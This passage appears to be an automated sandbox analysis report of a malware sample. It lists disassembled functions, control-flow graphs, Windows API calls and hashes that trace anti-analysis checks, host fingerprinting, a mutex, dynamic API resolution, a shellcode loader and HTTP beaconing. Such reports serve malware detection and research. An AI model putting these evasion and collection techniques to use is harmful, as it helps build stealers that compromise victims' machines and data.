                                              control_flow_graph 1058 4119f0-411a1d call 41ade0 StrCmpCA 1061 411a27-411a41 call 41ade0 strtok_s 1058->1061 1062 411a1f-411a21 ExitProcess 1058->1062 1065 411a44-411a48 1061->1065 1066 411c12-411c1d call 41ab10 1065->1066 1067 411a4e-411a61 1065->1067 1069 411a67-411a6a 1067->1069 1070 411bee-411c0d strtok_s 1067->1070 1072 411b41-411b52 StrCmpCA 1069->1072 1073 411ba1-411bb2 StrCmpCA 1069->1073 1074 411bc0-411bd1 StrCmpCA 1069->1074 1075 411b63-411b74 StrCmpCA 1069->1075 1076 411b82-411b93 StrCmpCA 1069->1076 1077 411a85-411a94 call 41ab30 1069->1077 1078 411aad-411abe StrCmpCA 1069->1078 1079 411acf-411ae0 StrCmpCA 1069->1079 1080 411a71-411a80 call 41ab30 1069->1080 1081 411a99-411aa8 call 41ab30 1069->1081 1082 411afd-411b0e StrCmpCA 1069->1082 1083 411b1f-411b30 StrCmpCA 1069->1083 1084 411bdf-411be9 call 41ab30 1069->1084 1070->1065 1098 411b54-411b57 1072->1098 1099 411b5e 1072->1099 1104 411bb4-411bb7 1073->1104 1105 411bbe 1073->1105 1085 411bd3-411bd6 1074->1085 1086 411bdd 1074->1086 1100 411b80 1075->1100 1101 411b76-411b79 1075->1101 1102 411b95-411b98 1076->1102 1103 411b9f 1076->1103 1077->1070 1090 411ac0-411ac3 1078->1090 1091 411aca 1078->1091 1092 411ae2-411aec 1079->1092 1093 411aee-411af1 1079->1093 1080->1070 1081->1070 1094 411b10-411b13 1082->1094 1095 411b1a 1082->1095 1096 411b32-411b35 1083->1096 1097 411b3c 1083->1097 1084->1070 1085->1086 1086->1070 1090->1091 1091->1070 1110 411af8 1092->1110 1093->1110 1094->1095 1095->1070 1096->1097 1097->1070 1098->1099 1099->1070 1100->1070 1101->1100 1102->1103 1103->1070 1104->1105 1105->1070 1110->1070
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcessstrtok_s
                                              • String ID: block
                                              • API String ID: 3407564107-2199623458
                                              • Opcode ID: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                              • Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
                                              • Opcode Fuzzy Hash: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                              • Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A
                                              Function 00415760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1111 415760-4157c7 call 415d20 call 41ab30 * 3 call 41aa50 * 4 1127 4157cc-4157d3 1111->1127 1128 4157d5-415806 call 41ab30 call 41aab0 call 401590 call 415440 1127->1128 1129 415827-41589c call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1127->1129 1144 41580b-415822 call 41abb0 call 41ab10 1128->1144 1155 4158e3-4158f9 call 41ade0 StrCmpCA 1129->1155 1159 41589e-4158de call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1129->1159 1144->1155 1160 415a2c-415a94 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1155->1160 1161 4158ff-415906 1155->1161 1159->1155 1290 415d13-415d16 1160->1290 1163 415a2a-415aaf call 41ade0 StrCmpCA 1161->1163 1164 41590c-415913 1161->1164 1183 415be1-415c49 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1163->1183 1184 415ab5-415abc 1163->1184 1167 415915-415969 call 41ab30 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1164->1167 1168 41596e-4159e3 call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1164->1168 1167->1163 1168->1163 1267 4159e5-415a25 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1168->1267 1183->1290 1189 415ac2-415ac9 1184->1189 1190 415bdf-415c64 call 41ade0 StrCmpCA 1184->1190 1196 415b23-415b98 call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1189->1196 1197 415acb-415b1e call 41ab30 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1189->1197 1219 415c66-415c71 Sleep 1190->1219 1220 415c78-415ce1 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1190->1220 1196->1190 1295 415b9a-415bda call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1196->1295 1197->1190 1219->1127 1220->1290 1267->1163 1295->1190
                                              APIs
                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02C9D528,?,004210F4,?,00000000), ref: 0041AB3B
                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                                • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
                                                • Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                                • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
                                                • Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
                                                • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
                                              • Sleep.KERNEL32(0000EA60), ref: 00415C6B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpylstrlen$Sleepstrtok
                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                              • API String ID: 3630751533-2791005934
                                              • Opcode ID: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                              • Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
                                              • Opcode Fuzzy Hash: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                              • Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A
                                              Function 00417690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1322 417690-4176da GetWindowsDirectoryA 1323 4176e3-417757 GetVolumeInformationA call 418e90 * 3 1322->1323 1324 4176dc 1322->1324 1331 417768-41776f 1323->1331 1324->1323 1332 417771-41778a call 418e90 1331->1332 1333 41778c-4177a7 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 4177a9-4177b6 call 41aa50 1333->1335 1336 4177b8-4177e8 wsprintfA call 41aa50 1333->1336 1343 41780e-41781e 1335->1343 1336->1343
                                              APIs
                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                              • HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                              • wsprintfA.USER32 ref: 004177D0
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                              • String ID: :$C$\
                                              • API String ID: 3790021787-3809124531
                                              • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                              • Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
                                              • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                              • Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9
                                              Function 0484003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1344 484003c-4840047 1345 484004c-4840263 call 4840a3f call 4840e0f call 4840d90 VirtualAlloc 1344->1345 1346 4840049 1344->1346 1361 4840265-4840289 call 4840a69 1345->1361 1362 484028b-4840292 1345->1362 1346->1345 1367 48402ce-48403c2 VirtualProtect call 4840cce call 4840ce7 1361->1367 1364 48402a1-48402b0 1362->1364 1366 48402b2-48402cc 1364->1366 1364->1367 1366->1364 1373 48403d1-48403e0 1367->1373 1374 48403e2-4840437 call 4840ce7 1373->1374 1375 4840439-48404b8 VirtualFree 1373->1375 1374->1373 1377 48405f4-48405fe 1375->1377 1378 48404be-48404cd 1375->1378 1381 4840604-484060d 1377->1381 1382 484077f-4840789 1377->1382 1380 48404d3-48404dd 1378->1380 1380->1377 1386 48404e3-4840505 LoadLibraryA 1380->1386 1381->1382 1387 4840613-4840637 1381->1387 1384 48407a6-48407b0 1382->1384 1385 484078b-48407a3 1382->1385 1388 48407b6-48407cb 1384->1388 1389 484086e-48408be LoadLibraryA 1384->1389 1385->1384 1390 4840517-4840520 1386->1390 1391 4840507-4840515 1386->1391 1392 484063e-4840648 1387->1392 1393 48407d2-48407d5 1388->1393 1396 48408c7-48408f9 1389->1396 1394 4840526-4840547 1390->1394 1391->1394 1392->1382 1395 484064e-484065a 1392->1395 1397 4840824-4840833 1393->1397 1398 48407d7-48407e0 1393->1398 1399 484054d-4840550 1394->1399 1395->1382 1400 4840660-484066a 1395->1400 1401 4840902-484091d 1396->1401 1402 48408fb-4840901 1396->1402 1408 4840839-484083c 1397->1408 1403 48407e4-4840822 1398->1403 1404 48407e2 1398->1404 1405 4840556-484056b 1399->1405 1406 48405e0-48405ef 1399->1406 1407 484067a-4840689 1400->1407 1402->1401 1403->1393 1404->1397 1412 484056d 1405->1412 1413 484056f-484057a 1405->1413 1406->1380 1409 4840750-484077a 1407->1409 1410 484068f-48406b2 1407->1410 1408->1389 1411 484083e-4840847 1408->1411 1409->1392 1416 48406b4-48406ed 1410->1416 1417 48406ef-48406fc 1410->1417 1418 4840849 1411->1418 1419 484084b-484086c 1411->1419 1412->1406 1414 484057c-4840599 1413->1414 1415 484059b-48405bb 1413->1415 1427 48405bd-48405db 1414->1427 1415->1427 1416->1417 1421 48406fe-4840748 1417->1421 1422 484074b 1417->1422 1418->1389 1419->1408 1421->1422 1422->1407 1427->1399
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0484024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 143476885a8a20b9c4abb79d2a40fa3860ba4b741457090b907c42d3e61f3335
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: D4528974A01229DFDB64CF68C984BADBBB1BF09304F1485D9E90DAB351DB30AA84DF11
                                              Function 00416C90 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C227A8), ref: 00419BF1
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C22970), ref: 00419C0A
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C229D0), ref: 00419C22
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C22988), ref: 00419C3A
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C229A0), ref: 00419C53
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C9D518), ref: 00419C6B
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C9CBC0), ref: 00419C83
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C9CA80), ref: 00419C9C
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C22A00), ref: 00419CB4
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C229E8), ref: 00419CCC
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C22940), ref: 00419CE5
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C229B8), ref: 00419CFD
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C9CA20), ref: 00419D15
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C22958), ref: 00419D2E
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                                • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                                • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                                • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                • Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
                                              • GetUserDefaultLCID.KERNEL32 ref: 00416CC6
                                                • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02C9D528,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                              • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                              • Sleep.KERNEL32(00001770), ref: 00416DA4
                                              • CloseHandle.KERNEL32(?,00000000,?,02C9D528,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                              • ExitProcess.KERNEL32 ref: 00416DC2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                              • String ID:
                                              • API String ID: 3511611419-0
                                              • Opcode ID: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
                                              • Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
                                              • Opcode Fuzzy Hash: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
                                              • Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E
                                              Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ??2@$CrackInternetlstrlen
                                              • String ID: <
                                              • API String ID: 1683549937-4251816714
                                              • Opcode ID: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                              • Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
                                              • Opcode Fuzzy Hash: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                              • Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95
                                              Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1493 401220-401247 call 418b40 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41dd30 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1501 401287 1499->1501 1502 40129a-40129d 1499->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                              • __aulldiv.LIBCMT ref: 00401258
                                              • __aulldiv.LIBCMT ref: 00401266
                                              • ExitProcess.KERNEL32 ref: 00401294
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                              • String ID: @
                                              • API String ID: 3404098578-2766056989
                                              • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                              • Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
                                              • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                              • Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D
                                              Function 00416D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1507 416d93 1508 416daa 1507->1508 1510 416d5a-416d77 call 41ade0 OpenEventA 1508->1510 1511 416dac-416dc2 call 416bc0 call 415d60 CloseHandle ExitProcess 1508->1511 1516 416d95-416da4 CloseHandle Sleep 1510->1516 1517 416d79-416d91 call 41ade0 CreateEventA 1510->1517 1516->1508 1517->1511
                                              APIs
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02C9D528,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                              • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                              • Sleep.KERNEL32(00001770), ref: 00416DA4
                                              • CloseHandle.KERNEL32(?,00000000,?,02C9D528,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                              • ExitProcess.KERNEL32 ref: 00416DC2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                              • String ID:
                                              • API String ID: 941982115-0
                                              • Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                              • Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
                                              • Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                              • Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B
                                              Function 00415440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02C9ED80), ref: 00406353
                                                • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02CA65B8,00000000,00000000,00400100,00000000), ref: 004063D5
                                                • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
